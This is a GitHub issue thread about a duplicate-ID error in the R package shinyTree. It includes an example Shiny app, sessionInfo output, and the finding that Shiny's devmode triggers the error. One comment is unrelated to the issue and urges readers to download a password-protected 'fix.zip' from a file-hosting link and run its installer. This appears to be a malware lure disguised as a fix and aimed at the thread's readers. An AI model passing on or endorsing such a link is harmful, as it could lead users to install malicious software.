### ISSUE TITLE
The following ID was repeated: - "tree123": 1 input and 1 output

### ISSUE THREAD

**Issue by chrisoswald** [shinyTree/shinyTree#126]
Trying the examples always brings error: 
(macos, google chrome browser, rstudio)

The following ID was repeated: - "tree123": 1 input and 1 output

and no tree is rendered.

Whats happened there?

thanks,

```r
ibrary(shiny)
library(shinyTree)

ui <- shinyUI(
  pageWithSidebar(
    # Application title
    headerPanel("shinyTree with 'selected' input"),
    
    sidebarPanel(
      helpText(HTML("An example of using shinyTree's <code>get_selected</code> function to extract the cells which are currently selected.
                  <hr>Created using <a href = \"http://github.com/trestletech/shinyTree\">shinyTree</a>."))
    ),
    mainPanel(
      "Currently Selected:",
      shinyTree("tree123"),
      hr(),
      "Currently Selected:",
      verbatimTextOutput("sel_names"),
      verbatimTextOutput("sel_slices"),
      verbatimTextOutput("sel_classid")
    )
  ))

server <- shinyServer(function(input, output, session) {
  
  output$tree123 <- renderTree({
    list(
      root1 = structure("123"),
      root2 = list(
        SubListA = list(leaf1 = "", leaf2 = "", leaf3=""),
        SubListB = list(leafA = "", leafB = "")
      )
    )
  })
  
  output$sel_names <- renderPrint({
    tree <- input$tree123
    req(tree)
    get_selected(tree)
  })
  output$sel_slices <- renderPrint({
    tree <- input$tree123
    req(tree)
    get_selected(tree, format = "slices")
  })
  output$sel_classid <- renderPrint({
    tree <- input$tree123
    req(tree)
    get_selected(tree, format = "classid")
  })
})

shinyApp(ui, server)

```

**Comment by trafficonese** [comment]
I cannot reproduce this on windows on any browser.
Can you post your `sessioninfo::session_info()` or `sessionInfo()`?

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chrisoswald** [comment]
Hm, I have restarted my mac and now its working!?

**Comment by chrisoswald** [comment]
No its not working, after starting my main-app the error persists. After that I get the error. And then the error persists. My app is relative complex but I had not using the same IDs. All is running good if I comment out the shinyTee command. I use the shinytree in a module - maybe a problem?


`
> sessionInfo()
R version 4.3.2 (2023-10-31)
Platform: aarch64-apple-darwin20 (64-bit)
Running under: macOS Sonoma 14.6.1

Matrix products: default
BLAS:   /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib 
LAPACK: /Library/Frameworks/R.framework/Versions/4.3-arm64/Resources/lib/libRlapack.dylib;  LAPACK version 3.11.0

locale:
[1] en_US.UTF-8/en_US.UTF-8/en_US.UTF-8/C/en_US.UTF-8/en_US.UTF-8

time zone: Europe/Berlin
tzcode source: internal

attached base packages:
[1] stats     graphics  grDevices utils     datasets  methods   base     

other attached packages:
 [1] crayon_1.5.3       doBy_4.6.20        dbx_0.3.1          reactable_0.4.4   
 [5] RSQLite_2.3.5      R.utils_2.12.3     R.oo_1.26.0        R.methodsS3_1.8.2 
 [9] shinyjs_2.1.0      shinyWidgets_0.8.1 openxlsx_4.2.5.2   lubridate_1.9.3   
[13] forcats_1.0.0      stringr_1.5.1      dplyr_1.1.4        purrr_1.0.2       
[17] readr_2.1.5        tidyr_1.3.1        tibble_3.2.1       ggplot2_3.5.0     
[21] tidyverse_2.0.0    shinyTree_0.3.1    shiny_1.8.1.1     

loaded via a namespace (and not attached):
 [1] gtable_0.3.4           bslib_0.7.0            htmlwidgets_1.6.4      lattice_0.21-9        
 [5] tzdb_0.4.0             vctrs_0.6.5            tools_4.3.2            generics_0.1.3        
 [9] fansi_1.0.6            blob_1.2.4             pkgconfig_2.0.3        Matrix_1.6-1.1        
[13] lifecycle_1.0.4        compiler_4.3.2         microbenchmark_1.4.10  munsell_0.5.0         
[17] fontawesome_0.5.2      httpuv_1.6.15          htmltools_0.5.8.1      sass_0.4.9            
[21] yaml_2.3.9             later_1.3.2            pillar_1.9.0           jquerylib_0.1.4       
[25] MASS_7.3-60            cachem_1.1.0           mime_0.12              Deriv_4.1.3           
[29] tidyselect_1.2.1       zip_2.3.1              digest_0.6.36          stringi_1.8.4         
[33] fastmap_1.2.0          grid_4.3.2             colorspace_2.1-0       cli_3.6.3             
[37] magrittr_2.0.3         utf8_1.2.4             broom_1.0.5            reactR_0.5.0          
[41] withr_3.0.0            backports_1.4.1        scales_1.3.0           promises_1.3.0        
[45] bit64_4.0.5            timechange_0.3.0       bit_4.0.5              hms_1.1.3             
[49] memoise_2.0.1          rlang_1.1.4            Rcpp_1.0.12            xtable_1.8-4          
[53] glue_1.7.0             DBI_1.2.3              rstudioapi_0.16.0.9000 jsonlite_1.8.8        
[57] R6_2.5.1  
`

**Comment by trafficonese** [comment]
Using modules should not be a problem. 
Is the error also coming when you use the example App from your fiirst message or just in your bigger app?

**Comment by chrisoswald** [comment]
starting the example app from scratch or after restart R session it's working, but if my app was running the example app get the error

**Comment by trafficonese** [comment]
This sounds like the bug is in your app and not in shinyTree.
Try to find a reproducible example, then I can help you.. but probably then you will find the source of the error yourself..

**Comment by scaro976** [comment]
I have the same issue when I run the shinyapp from a windows terminal with devmode enabled. 
[Path_to_R]\Rscript.exe [Path_to_package]\posit.shiny-1.1.0\rscripts\runShinyApp.R '[Path_to_app]\app_test.R' 62832 --devmode
The error disapear when removing devmode argument.

**Comment by bellma-lilly** [comment]
@scaro976 Thanks for this info. I have also had devmode issues (not just shinytree) on some platforms with the newest versions of R and Shiny. 
@chrisoswald : do you have devmode on when these problems occur?

**Comment by chrisoswald** [comment]
Yes I had devmode on, and I tried it with working with devmode off and it works, the error disappear.

**Comment by bellma-lilly** [comment]
@chrisoswald That's good to hear. I think this is a shiny bug. Devmode shouldn't break things. You might consider reporting this to shiny (or adding +1 to existing reports).
